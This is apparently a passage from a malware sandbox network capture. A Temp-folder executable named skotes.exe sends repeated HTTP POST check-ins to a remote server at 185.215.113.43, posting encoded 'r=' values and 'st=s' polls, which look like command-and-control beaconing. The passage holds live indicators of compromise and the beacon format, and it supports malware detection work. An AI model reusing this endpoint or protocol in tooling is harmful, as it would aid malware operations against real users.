                  Sep 25, 2024 10:35:45.792583942 CEST314OUTPOST /Zu7JuNko/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.43
                  Content-Length: 160
                  Cache-Control: no-cache
                  Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 32 32 41 37 35 42 37 35 43 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 35
                  Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A79B22A75B75C82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B5
                  Sep 25, 2024 10:35:46.501008987 CEST196INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Wed, 25 Sep 2024 08:35:46 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 7 <c><d>0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  69192.168.2.664760185.215.113.43801488C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                  TimestampBytes transferredDirectionData
                  Sep 25, 2024 10:35:48.148679018 CEST156OUTPOST /Zu7JuNko/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.43
                  Content-Length: 4
                  Cache-Control: no-cache
                  Data Raw: 73 74 3d 73
                  Data Ascii: st=s
                  Sep 25, 2024 10:35:48.837905884 CEST219INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Wed, 25 Sep 2024 08:35:48 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Refresh: 0; url = Login.php
                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 1 0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  70192.168.2.664761185.215.113.43801488C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                  TimestampBytes transferredDirectionData
                  Sep 25, 2024 10:35:50.360757113 CEST314OUTPOST /Zu7JuNko/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.43
                  Content-Length: 160
                  Cache-Control: no-cache
                  Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 32 32 41 37 35 42 37 35 43 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 35
                  Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A79B22A75B75C82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B5
                  Sep 25, 2024 10:35:51.065532923 CEST196INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Wed, 25 Sep 2024 08:35:50 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 7 <c><d>0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  71192.168.2.664762185.215.113.43801488C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                  TimestampBytes transferredDirectionData
                  Sep 25, 2024 10:35:52.705745935 CEST156OUTPOST /Zu7JuNko/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.43
                  Content-Length: 4
                  Cache-Control: no-cache
                  Data Raw: 73 74 3d 73
                  Data Ascii: st=s
                  Sep 25, 2024 10:35:53.512721062 CEST219INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Wed, 25 Sep 2024 08:35:53 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Refresh: 0; url = Login.php
                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 1 0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  72192.168.2.664763185.215.113.43801488C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                  TimestampBytes transferredDirectionData
                  Sep 25, 2024 10:35:55.152981997 CEST314OUTPOST /Zu7JuNko/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.43
                  Content-Length: 160
                  Cache-Control: no-cache
                  Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 32 32 41 37 35 42 37 35 43 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 35
                  Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A79B22A75B75C82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B5
                  Sep 25, 2024 10:35:55.867079020 CEST196INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Wed, 25 Sep 2024 08:35:55 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 7 <c><d>0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  73192.168.2.664764185.215.113.43801488C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                  TimestampBytes transferredDirectionData
                  Sep 25, 2024 10:35:57.522469997 CEST156OUTPOST /Zu7JuNko/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.43
                  Content-Length: 4
                  Cache-Control: no-cache
                  Data Raw: 73 74 3d 73
                  Data Ascii: st=s
                  Sep 25, 2024 10:35:58.246817112 CEST219INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Wed, 25 Sep 2024 08:35:58 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Refresh: 0; url = Login.php
                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 1 0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  74192.168.2.664765185.215.113.43801488C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                  TimestampBytes transferredDirectionData
                  Sep 25, 2024 10:35:59.756391048 CEST314OUTPOST /Zu7JuNko/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.43
                  Content-Length: 160
                  Cache-Control: no-cache
                  Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 32 32 41 37 35 42 37 35 43 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 35
                  Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A79B22A75B75C82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B5
                  Sep 25, 2024 10:36:00.460374117 CEST196INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Wed, 25 Sep 2024 08:36:00 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 7 <c><d>0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  75192.168.2.664766185.215.113.43801488C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                  TimestampBytes transferredDirectionData
                  Sep 25, 2024 10:36:02.310892105 CEST156OUTPOST /Zu7JuNko/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.43
                  Content-Length: 4
                  Cache-Control: no-cache
                  Data Raw: 73 74 3d 73
                  Data Ascii: st=s
                  Sep 25, 2024 10:36:03.021708012 CEST219INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Wed, 25 Sep 2024 08:36:02 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Refresh: 0; url = Login.php
                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 1 0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  76192.168.2.664767185.215.113.43801488C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                  TimestampBytes transferredDirectionData
                  Sep 25, 2024 10:36:04.697995901 CEST314OUTPOST /Zu7JuNko/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.43
                  Content-Length: 160
                  Cache-Control: no-cache
                  Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 32 32 41 37 35 42 37 35 43 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 35
                  Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A79B22A75B75C82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B5
                  Sep 25, 2024 10:36:05.707675934 CEST196INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Wed, 25 Sep 2024 08:36:05 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 7 <c><d>0
                  Sep 25, 2024 10:36:05.707748890 CEST196INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Wed, 25 Sep 2024 08:36:05 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 7 <c><d>0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  77192.168.2.664768185.215.113.43801488C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                  TimestampBytes transferredDirectionData
                  Sep 25, 2024 10:36:07.335206032 CEST156OUTPOST /Zu7JuNko/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.43
                  Content-Length: 4
                  Cache-Control: no-cache
                  Data Raw: 73 74 3d 73
                  Data Ascii: st=s
                  Sep 25, 2024 10:36:08.036984921 CEST219INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Wed, 25 Sep 2024 08:36:07 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Refresh: 0; url = Login.php
                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 1 0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  78192.168.2.664769185.215.113.43801488C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                  TimestampBytes transferredDirectionData
                  Sep 25, 2024 10:36:09.553716898 CEST314OUTPOST /Zu7JuNko/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.43
                  Content-Length: 160
                  Cache-Control: no-cache
                  Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 32 32 41 37 35 42 37 35 43 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 35
                  Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A79B22A75B75C82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B5
                  Sep 25, 2024 10:36:10.249022007 CEST196INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Wed, 25 Sep 2024 08:36:10 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 7 <c><d>0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  79192.168.2.664770185.215.113.43801488C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                  TimestampBytes transferredDirectionData
                  Sep 25, 2024 10:36:12.022192001 CEST156OUTPOST /Zu7JuNko/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.43
                  Content-Length: 4
                  Cache-Control: no-cache
                  Data Raw: 73 74 3d 73
                  Data Ascii: st=s
                  Sep 25, 2024 10:36:12.713136911 CEST219INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Wed, 25 Sep 2024 08:36:12 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Refresh: 0; url = Login.php
                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 1 0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  80192.168.2.664771185.215.113.43801488C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                  TimestampBytes transferredDirectionData
                  Sep 25, 2024 10:36:14.227332115 CEST314OUTPOST /Zu7JuNko/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.43
                  Content-Length: 160
                  Cache-Control: no-cache
                  Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 32 32 41 37 35 42 37 35 43 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 35
                  Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A79B22A75B75C82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B5
                  Sep 25, 2024 10:36:14.959640026 CEST196INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Wed, 25 Sep 2024 08:36:14 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 7 <c><d>0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  81192.168.2.664773185.215.113.43801488C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                  TimestampBytes transferredDirectionData
                  Sep 25, 2024 10:36:16.588416100 CEST156OUTPOST /Zu7JuNko/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.43
                  Content-Length: 4
                  Cache-Control: no-cache
                  Data Raw: 73 74 3d 73
                  Data Ascii: st=s
                  Sep 25, 2024 10:36:17.309568882 CEST219INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Wed, 25 Sep 2024 08:36:17 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Refresh: 0; url = Login.php
                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 1 0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  82192.168.2.664774185.215.113.43801488C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                  TimestampBytes transferredDirectionData
                  Sep 25, 2024 10:36:18.819691896 CEST314OUTPOST /Zu7JuNko/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.43
                  Content-Length: 160
                  Cache-Control: no-cache
                  Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 32 32 41 37 35 42 37 35 43 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 35
                  Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A79B22A75B75C82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B5
                  Sep 25, 2024 10:36:19.558557987 CEST196INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Wed, 25 Sep 2024 08:36:19 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 7 <c><d>0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  83192.168.2.664775185.215.113.43801488C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                  TimestampBytes transferredDirectionData
                  Sep 25, 2024 10:36:21.372128010 CEST156OUTPOST /Zu7JuNko/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.43
                  Content-Length: 4
                  Cache-Control: no-cache
                  Data Raw: 73 74 3d 73
                  Data Ascii: st=s
                  Sep 25, 2024 10:36:22.065582991 CEST219INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Wed, 25 Sep 2024 08:36:21 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Refresh: 0; url = Login.php
                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 1 0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  84192.168.2.664776185.215.113.43801488C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                  TimestampBytes transferredDirectionData
                  Sep 25, 2024 10:36:23.587848902 CEST314OUTPOST /Zu7JuNko/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.43
                  Content-Length: 160
                  Cache-Control: no-cache
                  Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 32 32 41 37 35 42 37 35 43 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 35
                  Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A79B22A75B75C82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B5
                  Sep 25, 2024 10:36:24.280637026 CEST196INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Wed, 25 Sep 2024 08:36:24 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 7 <c><d>0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  85192.168.2.664777185.215.113.43801488C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                  TimestampBytes transferredDirectionData
                  Sep 25, 2024 10:36:25.912656069 CEST156OUTPOST /Zu7JuNko/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.43
                  Content-Length: 4
                  Cache-Control: no-cache
                  Data Raw: 73 74 3d 73
                  Data Ascii: st=s
                  Sep 25, 2024 10:36:26.632025003 CEST219INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Wed, 25 Sep 2024 08:36:26 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Refresh: 0; url = Login.php
                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 1 0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  86192.168.2.664778185.215.113.43801488C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                  TimestampBytes transferredDirectionData
                  Sep 25, 2024 10:36:28.147414923 CEST314OUTPOST /Zu7JuNko/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.43
                  Content-Length: 160
                  Cache-Control: no-cache
                  Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 32 32 41 37 35 42 37 35 43 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 35
                  Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A79B22A75B75C82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B5
                  Sep 25, 2024 10:36:29.155380011 CEST196INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Wed, 25 Sep 2024 08:36:28 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 7 <c><d>0
                  Sep 25, 2024 10:36:29.155462027 CEST196INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Wed, 25 Sep 2024 08:36:28 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 7 <c><d>0
                  Sep 25, 2024 10:36:29.353523016 CEST196INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Wed, 25 Sep 2024 08:36:28 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 7 <c><d>0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  87192.168.2.664779185.215.113.43801488C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                  TimestampBytes transferredDirectionData
                  Sep 25, 2024 10:36:30.788799047 CEST156OUTPOST /Zu7JuNko/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.43
                  Content-Length: 4
                  Cache-Control: no-cache
                  Data Raw: 73 74 3d 73
                  Data Ascii: st=s
                  Sep 25, 2024 10:36:31.482470036 CEST219INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Wed, 25 Sep 2024 08:36:31 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Refresh: 0; url = Login.php
                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 1 0


                  Session IDSource IPSource PortDestination IPDestination Port
                  88192.168.2.664780185.215.113.4380
                  TimestampBytes transferredDirectionData
                  Sep 25, 2024 10:36:34.061943054 CEST314OUTPOST /Zu7JuNko/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.43
                  Content-Length: 160
                  Cache-Control: no-cache
                  Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 32 32 41 37 35 42 37 35 43 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 35
                  Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A79B22A75B75C82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B5
                  Sep 25, 2024 10:36:34.771907091 CEST196INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Wed, 25 Sep 2024 08:36:34 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 7 <c><d>0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  89192.168.2.664781185.215.113.43801488C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                  TimestampBytes transferredDirectionData
                  Sep 25, 2024 10:36:36.415894985 CEST156OUTPOST /Zu7JuNko/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.43
